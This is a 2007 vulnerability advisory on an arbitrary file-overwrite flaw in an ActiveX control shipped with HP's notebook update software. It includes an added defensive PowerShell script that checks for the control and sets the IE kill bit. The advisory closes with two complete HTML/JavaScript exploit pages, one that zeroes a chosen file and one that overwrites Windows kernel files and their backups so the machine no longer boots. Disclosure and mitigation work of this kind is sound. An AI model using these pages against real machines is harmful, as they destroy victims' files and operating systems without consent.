hp-activex.txt
Posted on 20 December 2007
Advisory:
/////////

There is another remotely exploitable flaw within software preinstalled on HP notebook machines. This time the culprit is the automatic software update tool provided by the vendor. Potential exploitation may lead to loss of user files or to altering vital system files (e.g. the kernel), thus leaving the PC unbootable.

Overview:
/////////

The flaw is located in the software called HP Software Update, shipped with HP notebooks to support automatic software updates and critical vulnerability patching. One of the ActiveX controls deployed by default by the vendor contains an insecure method giving a potential attacker arbitrary file write access on the remote system.

Impact:
///////

Remote corruption of user file contents
Remote damage to system kernel files / Operating System DoS condition

Attack vectors:
///////////////

There are two main attack vector schemes:

- inducing the remote user to launch a WWW link after obtaining the location(s) and name(s) of an arbitrary file or files on the remote system. After clicking the link the file contents will be unrecoverably destroyed. This attack vector thus requires additional social engineering of the victim to acquire the exact name and location of the potential target files.

- inducing the remote user to launch a WWW link resulting in corruption of vital Operating System files, leaving the system unusable. This attack vector DOESN'T require any additional social engineering of the victim, because the system files are always placed in predictable locations.

Technical details:
//////////////////

The vulnerable ActiveX control RulesEngine.dll is a component of the HP Software Update system designed by the vendor. It has the CLSID 7CB9D4F5-C492-42A4-93B1-3F7D6946470D assigned and is by default included in the "Safe for Scripting" OLE components, which allows full scripting access to the control's methods from within the browser.
The default control installation path is:
C:\Program Files\Hewlett-Packard\eSupport\Diags\RulesEngine.dll

The control is used by the HP Software Update software's HPWUCli.exe client application to enumerate, load and store information about available software patches. The HPWUCli.exe binary is located in the directory:
C:\Program Files\HP\HP Software Update\

The control may also be used by a remote WWW service, such as the Hewlett-Packard online software update service.

The potentially insecure method is:

void SaveToFile(String dataFilePath);

This method is used to store the software patch specific data (version, remote location, vendor name, software description) in a binary file beginning with a 32-bit integer value containing the count of patches stored in the data file.

The problem lies in the lack of distinction between a local and a global data file area in this control. Both the LoadDataFromFile() method and the SaveDataToFile() method have access to the entire file system, therefore any arbitrary user file can be accessed remotely by a remote entity using one of these methods. SaveDataToFile() can be exploited to store the empty-by-initialization software patch data in an existing file, which results in loss of the previous file contents and resets the file to 4 zero bytes, describing a zero-size patch.

Given the specific location of the vulnerability (the vendor's software update system), simply disabling the vulnerable control by a vendor patch (as in the other HP software vulnerability case, HPInfo) would in this case compromise the machine's software update system and leave the user vulnerable to future security issues. Therefore a reimplementation of the update system and/or a local data area implementation for the vulnerable control is strongly recommended.
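The following PowerShell script is an added defensive example and is not part of the original advisory or of HP's software. It checks, on a Windows host, whether the RulesEngine.dll control (CLSID from the advisory above) is registered and marked "Safe for Scripting", whether Internet Explorer's kill bit is already set for it, and offers to set the kill bit; it also scans the kernel images named in this advisory for the 4-zero-byte signature a SaveToFile() overwrite leaves behind. The CATID values and the 0x400 Compatibility Flags kill bit are standard Windows/IE mechanisms, not something the advisory documents; the function names are this example's own.

```powershell
# Added example (not part of the original advisory). Assumes a Windows host with
# the IE "ActiveX Compatibility" registry hive. $Clsid is the value given in the
# advisory; the CATID_* constants are the standard OLE component-category ids.
$Clsid = '{7CB9D4F5-C492-42A4-93B1-3F7D6946470D}'
$CatIdSafeForScripting    = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'   # CATID_SafeForScripting
$CatIdSafeForInitializing = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'   # CATID_SafeForInitializing
$KillBit = 0x400   # Compatibility Flags kill bit: IE refuses to instantiate the control

$ClsidHives  = 'HKLM:\SOFTWARE\Classes\CLSID',
               'HKLM:\SOFTWARE\Wow6432Node\Classes\CLSID'
$CompatHives = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
               'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'

# Report whether the control is registered, which safety categories it claims,
# and whether the IE kill bit is already set for it.
function Get-ControlSafetyStatus {
    $r = [ordered]@{ Registered = $false; SafeForScripting = $false
                     SafeForInitializing = $false; KillBitSet = $false }
    foreach ($hive in $ClsidHives) {
        $key = Join-Path $hive $Clsid
        if (Test-Path $key) {
            $r.Registered = $true
            $cats = Join-Path $key 'Implemented Categories'
            if (Test-Path (Join-Path $cats $CatIdSafeForScripting))    { $r.SafeForScripting    = $true }
            if (Test-Path (Join-Path $cats $CatIdSafeForInitializing)) { $r.SafeForInitializing = $true }
        }
    }
    foreach ($compat in $CompatHives) {
        $key = Join-Path $compat $Clsid
        if (Test-Path $key) {
            $flags = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
            if ($flags -band $KillBit) { $r.KillBitSet = $true }
        }
    }
    [pscustomobject]$r
}

# Set the IE kill bit so the browser no longer instantiates the control. The control
# stays registered; whether HPWUCli.exe still works afterwards is something to verify
# on a test machine, since a native COM client is not subject to the IE kill bit.
function Set-ControlKillBit {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()
    foreach ($compat in $CompatHives) {
        if (-not (Test-Path $compat)) { continue }   # Wow6432Node is absent on 32-bit Windows
        $key = Join-Path $compat $Clsid
        if ($PSCmdlet.ShouldProcess($key, 'Set Compatibility Flags = 0x400')) {
            if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
            New-ItemProperty -Path $key -Name 'Compatibility Flags' -PropertyType DWord -Value $KillBit -Force | Out-Null
        }
    }
}

# Forensic check: a file overwritten through SaveToFile() is exactly 4 zero bytes
# (a patch data file with a zero patch count). Scan the kernel images and the
# three directories the advisory names.
function Test-ZeroedKernelFiles {
    param([string]$WinDir = $env:SystemRoot)
    $names = 'ntoskrnl.exe', 'ntkrnlpa.exe', 'ntkrnlmp.exe', 'ntkrpamp.exe'
    $dirs  = 'system32\dllcache', 'system32', 'Driver Cache\i386'
    foreach ($d in $dirs) {
        foreach ($n in $names) {
            $p = Join-Path (Join-Path $WinDir $d) $n
            if (-not (Test-Path $p)) { continue }
            $bytes  = [System.IO.File]::ReadAllBytes($p)
            $zeroed = ($bytes.Length -eq 4) -and (@($bytes | Where-Object { $_ -ne 0 }).Count -eq 0)
            [pscustomobject]@{ Path = $p; Length = $bytes.Length; Zeroed = $zeroed }
        }
    }
}

Get-ControlSafetyStatus
Test-ZeroedKernelFiles | Where-Object Zeroed
# Set-ControlKillBit -WhatIf   # dry run; drop -WhatIf to apply (needs an elevated shell)
```

Run the script from an elevated PowerShell session; the status and scan functions are read-only, and Set-ControlKillBit only writes when called without -WhatIf. A machine on which Get-ControlSafetyStatus reports SafeForScripting without KillBitSet is exposed to any web page that can instantiate the control.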
Remote Kernel Wreckage Exploit
//////////////////////////////

Using this flaw one can construct an armed exploit, able for example to destroy remote system kernel files and make the remote machine UNBOOTABLE. The exploit uses the vulnerable SaveToFile() to overwrite the NT system kernel files with the 4 zero bytes. The targets are the memory-mapped ntoskrnl.exe and ntkrnlpa.exe kernel files, which don't have a write lock set on them and may be opened for writing. Although the Windows NT system contains a protection against this kind of activity (system files overwrite), it can be fooled by simultaneously overwriting: the system binary files backup directory (System32\DllCache), the actual system kernel files (System32) and the Driver Backup directory (Windows\Driver Cache) kernel files.

After execution it will store zero-initialized patch information using the SaveToFile() method sequentially to the ntoskrnl.exe, ntkrnlpa.exe, ntkrnlmp.exe and ntkrpamp.exe NT kernel files, first in the System32\DllCache directory, second in the System32 directory and finally in the Windows\Driver Cache directory. After the very next OS shutdown, the machine will not be bootable anymore.

The exploit code has been attached to the end of this advisory. NOTE however that it is provided ONLY as Proof of Concept code and has been released ONLY to estimate the impact level of the issue.

Vulnerable Software:
////////////////////

HP Software Update client v3.0.8.4
RulesEngine.dll ActiveX CTL v1.0
Internet Explorer 6.0
Internet Explorer 7.0
Windows XP Home
Windows XP Pro
Windows 2000
Windows 2003
Windows Vista

Vulnerable Hardware
///////////////////

Every HP notebook machine containing the HP Software Update application is vulnerable. It is possible that the list of vulnerable machine models disclosed by the vendor as confirmation of the previous issue concerning HP laptops, the "HP Info Center" case, will be similar in this case.
Exploits:
/////////

//////////////////////////////////////////
//Remote Arbitrary File Corruption Exploit
//////////////////////////////////////////

<html>
<head>
<script language="JavaScript">
var filePath="c:\temp\testfile.txt";
function spawn3()
{
  o2obj.SaveToFile(filePath);
}
</script>
</head>
<body onload="spawn3()">
<object ID="o2obj" WIDTH=0 HEIGHT=0 classid="clsid:7CB9D4F5-C492-42A4-93B1-3F7D6946470D"
</object>
</body>
</html>

////////////////////////////////
//Remote Kernel Wreckage Exploit
////////////////////////////////
//
//
// WARNING! THE REAL THING...
// DON'T TRY THIS AT HOME!
// THIS WILL DAMAGE YOUR
// HP COMPUTER SYSTEM!!!
//
//
////////////////////////////////

<html>
<head>
<script language="JavaScript">
function spawn3()
{
  o2obj.EvaluateRules();
  o2obj.SaveToFile("c:\WINDOWS\system32\dllcache\ntoskrnl.exe");
  o2obj.SaveToFile("c:\WINDOWS\system32\dllcache\ntkrnlpa.exe");
  o2obj.SaveToFile("c:\WINDOWS\system32\dllcache\ntkrnlmp.exe");
  o2obj.SaveToFile("c:\WINDOWS\system32\dllcache\ntkrpamp.exe");
  o2obj.SaveToFile("c:\WINDOWS\system32\ntoskrnl.exe");
  o2obj.SaveToFile("c:\WINDOWS\system32\ntkrnlpa.exe");
  o2obj.SaveToFile("c:\WINDOWS\Driver Cache\i386\ntoskrnl.exe");
  o2obj.SaveToFile("c:\WINDOWS\Driver Cache\i386\ntkrnlpa.exe");
  o2obj.SaveToFile("c:\WINDOWS\Driver Cache\i386\ntkrnlmp.exe");
  o2obj.SaveToFile("c:\WINDOWS\Driver Cache\i386\ntkrpamp.exe");
  o2obj.SaveToFile("c:\WINDOWS\Driver Cache\i386\sp2.cab");
  o2obj.SaveToFile("c:\WINDOWS\Driver Cache\i386\driver.cab");
}
function meltdown()
{
  spawn3();
  spawn3();
  spawn3();
}
</script>
</head>
<body onload="meltdown()">
<object ID="o2obj" WIDTH=0 HEIGHT=0 classid="clsid:7CB9D4F5-C492-42A4-93B1-3F7D6946470D"
</object>
</body>
</html>

Related final word:
///////////////////

Spiderpig, spiderpig, does whatever the spiderpig does...
;-)

Links:
//////

Original advisory link: www.anspi.pl/~porkythepig/hp-issue/wyfukanyszynszyl.txt

Credits:
////////

Issue discovery and research: porkythepig
Contact: porkythepig@anspi.pl